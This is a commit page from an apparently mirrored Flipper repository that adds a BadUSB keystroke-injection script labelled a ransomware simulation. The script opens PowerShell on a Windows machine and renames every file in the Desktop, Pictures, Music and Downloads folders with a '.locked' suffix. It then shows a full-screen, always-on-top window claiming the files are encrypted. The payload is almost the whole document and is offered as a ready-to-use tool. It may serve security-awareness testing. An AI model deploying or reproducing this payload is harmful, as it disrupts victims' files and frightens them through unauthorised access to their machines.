mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
Create RansomwareSimulation1.txt
This commit is contained in:
parent
11e02f2931
commit
e8a708408e
@ -0,0 +1,91 @@
|
||||
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
|
||||
REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
|
||||
REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
|
||||
REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
|
||||
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
REM opens powershell (this is for windows machines)
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 3000
|
||||
REM Define the locations using correct SpecialFolder enumerations
|
||||
STRING $folders = @(
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING [System.Environment+SpecialFolder]::Desktop,
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING [System.Environment+SpecialFolder]::MyPictures,
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING [System.Environment+SpecialFolder]::MyMusic,
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING [System.Environment+SpecialFolder]::Downloads
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING )
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM Iterate over each location
|
||||
STRING foreach ($folder in $folders) {
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $path = [Environment]::GetFolderPath($folder)
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM Get all files in the path and rename them
|
||||
STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING }
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 2000
|
||||
REM Display ransomware message
|
||||
STRING Add-Type -AssemblyName PresentationFramework
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $Window = New-Object System.Windows.Window
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $Window.WindowStartupLocation = 'CenterScreen'
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $Window.WindowState = 'Maximized'
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $Window.Topmost = $true
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $Window.ShowDialog()
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING exit
|
||||
DELAY 500
|
||||
ENTER
|
||||
REM check out my github at github.com/markcyber for more badusb & hacking type tools
|
Loading…
Reference in New Issue
Block a user